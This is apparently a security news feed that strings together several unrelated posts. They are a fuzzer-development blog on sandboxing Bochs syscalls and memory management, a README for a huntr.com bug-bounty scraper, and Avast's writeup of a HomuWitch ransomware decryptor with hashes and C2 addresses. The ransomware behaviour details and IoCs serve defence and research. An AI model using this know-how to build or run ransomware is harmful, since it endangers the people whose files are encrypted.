                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \
                --with-nogui

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address
}

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {
            libc::mmap(
                addr,
                length,
                prot,
                flags,
                fd,
                offset
            )
        };

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed `mmap` memory for MMU"));
        }

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,
        })
    }

Handling memory-management syscalls actually wasn’t too difficult, there were some gotcha’s early on but we managed to get something working fairly quickly.

Handling brk

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);
            }

            // Return the program break
            context.mmu.curr_brk as u64
        },

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;

        Ok(())
    }

So if we get a NULL argument in a1, we have nothing to do, nothing in the current MMU state needs adjusting, we just simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk memory is large enough to accomodate the request and if it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.

Handling mmap and munmap

mmap is a bit more involved, but still easy to track through. For mmap calls, theres more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory, in that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);
                }

                // Succesful regular mmap
                return context.mmu.curr_mmap as u64;
            }
// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());
        }

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())
        }

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())
        }

        if fd as i64 != -1 {
            return Err(())
        }

        if offset != 0 {
            return Err(())
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation
        Ok(())
    }

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.

There is also a case where mmap will be called with a non-NULL address and MAP_FIXED flags meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory, we’ve already created it, so this last mmap call you see above amounts to a NOP for us, there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.

You can see that Bochs does quite a bit of brk and mmap calls and our fuzzer is now capable of handling them all via our MMU:

...
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to just already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward, we really only need to keep a few metadata and the file contents themselves:

#[derive(Clone)]
pub struct FileTable {
    files: Vec<File>,
}

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));
        }

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                }
            
                bochsrc = Some(args[i + 1].clone());
                break;
            }
        }

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));
        };

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,
        };

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],
        })
    }

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file, this really should never happen?
        Err(())
    }

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)
    }
}

#[derive(Clone)]
pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file
}

So when Bochs asks to read a file and provides the fd, we just check the FileTable for the correct file and then read its contents from the File::contents buffer and then update the cursor struct member to keep track of where in the file our current offset is.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);
            };

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                std::ptr::copy(
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len
            }

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64
        },

open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);
            }            

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);
            };

            // Validate permissions
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);
            }

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);
            }

            // Success
            fd.unwrap() as u64
        },
// Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file
        Err(())
    }

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.

Conclusion

The work continues on the fuzzer, I’m still having a blast implementing it, special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and it get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program such that we can snapshot and fuzz appropriately, that should be really fun, until then!

Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

By: Zion3R


New bug bounty(vulnerabilities) collector


Requirements
  • Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)
  • Chrome WebDriver

Preview
# python3 main.py

*2024-02-20 16:14:47.836189*

1. Arbitrary File Reading due to Lack of Input Filepath Validation
- Feb 6th 2024 / High (CVE-2024-0964)
- gradio-app/gradio
- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

2. View Barcode Image leads to Remote Code Execution
- Jan 31st 2024 / Critical (CVE: Not yet)
- dolibarr/dolibarr
- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

(delimiter-based file database)

# vim feeds.db

1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/

Notes
  • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
  • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
  • If get in trouble In a typical cloud environment, scripts may not function properly within virtual machines (VMs).


Decrypted: HomuWitch Ransomware

HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users – individuals – rather than institutions and companies. Its prevalence isn’t remarkably large, nor is the requested ransom payment amount, which has allowed the strain to stay relatively under the radar thus far.

During our investigation of the threat, we found a vulnerability, which allowed us to create a free decryption tool for all the HomuWitch victims. We are now sharing this tool publicly to help impacted individuals decrypt their files, free of charge.

Despite a decrease in HomuWitch activity recently, we will continue to closely monitor this threat.

Skip to how to use the HomuWitch ransomware decryptor.

About HomuWitch

HomuWitch is a ransomware written in C# .NET. Its name comes from the file version information of the binary. Victims are usually infected via a SmokeLoader backdoor, masked as pirated software, which later installs a malicious dropper that executes the HomuWitch ransomware. Cases of infection are primarily found in two locations – Poland and Indonesia.

Overview of the dropper responsible for HomuWitch ransomware

HomuWitch Behavior

After the execution begins, drive letters are enumerated and those with a size smaller than 3,500 MB – as well as current user’s directories for Pictures, Downloads, and Documents – are considered in the encryption process. Then, only files with specific extensions with size less than 55 MB are chosen to be encrypted. The list of the extensions contains following:

.pdf, .doc, .docx, .ppt, .pptx, .xls, .py, .rar, .zip, .7z, .txt, .mp4, .JPG, .PNG, .HEIC, .csv, .bbbbbbbbb

HomuWitch transforms the files with combination of Deflate algorithm for compression and AES-CBC algorithm for encryption, appending .homuencrypted extension to the filename. Most ransomware strains perform file encryption; HomuWitch also adds file compression. This causes the encrypted files to be smaller than originals.

HomuWitch file-encryption routine

HomuWitch contains a vulnerability present during the encryption process that allows the victims to retrieve all their files without paying the ransom. New or previously unknown samples may make use of different encryption schema, so they may not be decryptable without further analysis.

It is also using command-and-control (CnC) infrastructure for its operation, mostly located in Europe. Before encryption, HomuWitch sends the following personal information to its CnC servers:

Computer name, Country code, Keyboard layout, Device ID

HomuWitch CnC communication

After encryption, a ransom note is either retrieved from the CnC server or (in some samples) is stored in the sample resources. The ransom typically varies $25 to $70, demanding the payment to be made with Monero cryptocurrency. Here is an example of HomuWitch ransom note:

How to use the Avast HomuWitch ransomware decryption tool to decrypt files encrypted by the ransomware

Follow these steps to decrypt your files:

  1. Download the free decryptor here.
  2. Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.
  3. On the initial page, you can read the license information if you want, but you only need to click “Next”
  1. On the following page, select the list of locations you want to be searched for and decrypted. By default, it contains a list of all local drives:
  1. On the third page, you need to provide a file in its original form and one which was encrypted by the HomuWitch ransomware. Enter both names of the files. If you have an encryption password created by a previous run of the decryptor, you can select “I know the password for decrypting files” option:
  1. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. The password cracking process uses all known HomuWitch passwords to determine the correct one.
  1. Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking “Next”.
  1. On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking “Decrypt” the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.
Indicators of Compromise (IoCs)

Samples (SHA256)

03e4f770157c11d86d462cc4e9ebeddee3130565221700841a7239e68409accf
0e42c452b5795a974061712928d5005169126ad1201bd2b9490f377827528e5d
16c3eea8ed3a44ee22dad8e8aec0c8c6b43c23741498f11337779e6621d1fe4e
33dd6dfd51b79dad25357f07a8fb4da47cec010e0f8e6d164c546a18ad2a762c
3546b2dd517a99249ef5fd8dfd2a8fd80cb89dfdc9e38602e1f3115634789316
4ea00f1ffe2bbbf5476c0eb677ac75cf1a765fe5c8ce899f47eb8b344da878ed
6252cda4786396ebd7e9baf8ff0454d6af038aed48a7e4ec33cd9249816db2f4
9343a0714a0e159b1d49b591f0835398076af8c8e2da56cbb8c9b7a15c9707c8
bd90468f50629728d717c53cd7806ba59d6ad9377163d0d3328d6db4db6a3826
cd4c3db443dbfd768c59575ede3b1e26002277c109d39ea020d1bc307374e309
fd32a8c5cd211b057fdf3e7cc27167296c71e3fb42daa488649cdf81f58f6848

Command-and-Control Servers

IP AddressOrigin
78.142.0.42US
79.137.207.233Germany
185.216.68.97Netherlands
193.164.150.225Russia

IoCs are available at https://github.com/avast/ioc/tree/master/HomuWitch

The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.

Fuzzer Development 2: Sandboxing Syscalls

By: h0mbre

Introduction

If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.

Syscalls

Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers, reading/writing memory, your process is executing in user-mode within your processes’ virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing it’s thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

  1. recognize that Bochs is trying to syscall, this isn’t always easy to do weirdly
  2. intercept execution and redirect to the appropriate code path
  3. save Bochs’ execution state
  4. execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
  5. return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for open, you’re not directly making a syscall, you’re calling into the library’s open function and that function is the one emitting a syscall instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()

Musl

